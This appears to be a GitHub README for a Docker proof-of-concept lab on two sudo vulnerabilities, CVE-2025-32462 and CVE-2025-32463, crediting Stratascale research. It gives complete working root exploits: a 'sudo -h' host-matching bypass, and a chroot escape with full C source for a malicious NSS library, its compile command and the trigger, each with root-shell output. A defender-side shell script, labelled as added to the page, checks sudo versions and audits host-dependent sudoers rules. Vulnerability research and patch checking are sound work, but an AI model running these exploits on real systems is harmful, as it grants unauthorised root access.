MAAYTHM/CVE-2025-32462_32463-Lab
CVE-2025-32462 & CVE-2025-32463 – PoC Lab

This is a container-based lab and PoC for the following vulnerabilities in sudo:

  • CVE-2025-32462 – sudo -h host matching logic bypass
  • CVE-2025-32463 – sudo -R chroot NSS library escape

🔒 For educational purposes only. Do not use on systems you don’t own or have permission to test.


🔬 Original Research

🧠 Research Credit

  • Rich Mirch
    Stratascale Cyber Research Unit (CRU)
    @Stratascale

🧪 Lab Setup (Docker)

🔧 Dockerfile

FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
                       pkg-config libssl-dev git nano gcc && \
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && make && make install

RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

🚀 Build & Run

docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null

Extra setup for CVE-2025-32462

docker exec -u root -it lowpriv bash

# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

Manual Exploitation

CVE-2025-32462

Normal Operation

pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required

Exploitation

pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)

pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local
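The bypass above only matters when sudoers contains host-dependent rules like the Host_Alias entries added in the extra setup, and the chroot escape in the next section fires even for a user with no sudoers entry at all, so the defender-side checks are (1) is the installed sudo at or past the fixed release, and (2) which sudoers rules depend on the host field. The following POSIX shell script is an added example written for this page, not code from the MAAYTHM lab or from the sudo project. It assumes the affected ranges from the Stratascale advisory (CVE-2025-32462: sudo 1.8.8 through 1.9.17; CVE-2025-32463: 1.9.14 through 1.9.17; both fixed in 1.9.17p1) and uses a constructed sudoers sample that mirrors the lab's extra setup; the sudoers parsing is a heuristic, not a full sudoers grammar.

```shell
#!/bin/sh
# Added example, not part of the MAAYTHM lab or of sudo itself: a defender-side
# check for the two CVEs this lab covers. Affected ranges (CVE-2025-32462:
# sudo 1.8.8 through 1.9.17; CVE-2025-32463: 1.9.14 through 1.9.17) and the
# fixed release 1.9.17p1 follow the Stratascale advisory (assumption: the
# advisory's ranges are complete). The sudoers text below is a constructed
# sample that mirrors the lab's "extra setup" step.

# Map a sudo version string such as "1.9.16p2" or "1.9.17" onto one integer so
# versions can be compared with -ge/-lt. Layout: MAJ*10^7 + MIN*10^5 + PATCH*10^2 + P.
sudo_version_key() {
    v=$1
    maj=${v%%.*}
    rest=${v#*.}
    min=${rest%%.*}
    case $rest in
        *.*) rest=${rest#*.} ;;   # "9.16p2" -> "16p2"
        *)   rest=0 ;;            # no patch level at all
    esac
    case $rest in
        *p*) patch=${rest%%p*}; p=${rest#*p} ;;   # "16p2" -> patch 16, p 2
        *)   patch=$rest; p=0 ;;
    esac
    echo $(( maj * 10000000 + min * 100000 + patch * 100 + p ))
}

# Report which of the lab's CVEs a given sudo version is exposed to. Prints
# "fixed", "not affected", or the space-separated CVE ids; returns 1 only when
# the version is exposed, so it can drive a scripted check.
sudo_version_status() {
    k=$(sudo_version_key "$1")
    if [ "$k" -ge "$(sudo_version_key 1.9.17p1)" ]; then
        echo fixed
        return 0
    fi
    exposed=
    [ "$k" -ge "$(sudo_version_key 1.8.8)" ] && exposed="CVE-2025-32462"
    [ "$k" -ge "$(sudo_version_key 1.9.14)" ] && exposed="${exposed:+$exposed }CVE-2025-32463"
    if [ -z "$exposed" ]; then
        echo "not affected"
        return 0
    fi
    echo "$exposed"
    return 1
}

# Print the sudoers entries whose meaning depends on the host field: Host_Alias
# definitions, host-qualified Defaults, and user specifications whose host list
# is not ALL. On an unpatched sudo, CVE-2025-32462 lets a local user satisfy
# such a rule by naming one of the listed hosts with -h, so these are the
# entries to review until sudo is upgraded. Reads sudoers text on stdin.
# Heuristic parser: one entry per line, no line continuations.
sudoers_host_rules() {
    awk '
        { sub(/#.*/, ""); sub(/^[ \t]+/, "") }      # strip comments and indent
        /^$/ { next }
        /^Host_Alias/ { print "host alias:          " $0; next }
        /^Defaults@/  { print "host-bound Defaults: " $0; next }
        /^(Defaults|User_Alias|Runas_Alias|Cmnd_Alias|@include)/ { next }
        /=/ {
            split($0, sides, "=")                   # "user hostlist" is left of the first =
            n = split(sides[1], f, /[ \t]+/)
            if (n >= 2 && f[2] != "" && f[2] != "ALL")
                print "host-specific rule:  " $0
        }
    '
}

# Number of host-dependent entries on stdin (0 means nothing to review).
sudoers_host_rule_count() {
    sudoers_host_rules | awk 'END { print NR }'
}

# Constructed sample mirroring the lab's extra setup for CVE-2025-32462.
SAMPLE_SUDOERS='Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
Host_Alias HIGH = highpriv.test.local
Host_Alias LOW = lowpriv.test.local
pwn HIGH,!LOW = NOPASSWD:ALL'

# Run directly: classify the installed sudo (if present) and audit the sample.
if command -v sudo >/dev/null 2>&1; then
    ver=$(sudo --version 2>/dev/null | sed -n '1s/^Sudo version //p')
    if [ -n "$ver" ]; then
        echo "installed sudo $ver: $(sudo_version_status "$ver")"
    fi
fi
printf '%s\n' "$SAMPLE_SUDOERS" | sudoers_host_rules
```

On the lab container the version check reports both CVEs for 1.9.16p2 and the audit lists the two Host_Alias lines plus the `pwn HIGH,!LOW` rule; to audit a real host, replace the sample with `cat /etc/sudoers /etc/sudoers.d/* | sudoers_host_rules`. The version comparison treats 1.9.17 without a patch level as still exposed, which matches the advisory's "through 1.9.17" wording.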

CVE-2025-32463

Normal Operation

pwn@lowpriv:~$ sudo id
Password: 
pwn is not allowed to run sudo on lowpriv.

Preparation

# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc

# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf

# Step 3: Create directory for the malicious NSS library
mkdir libnss_

# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/

# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT

root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

Disclaimer

This PoC is for educational and authorized research only.


✍️ Author

PoC lab and Docker environment by MAAYTHM.

Research credit: Rich Mirch – Stratascale CRU

About

Docker PoC for CVE-2025-32462 & CVE-2025-32463 (sudo), based on Stratascale CRU research.
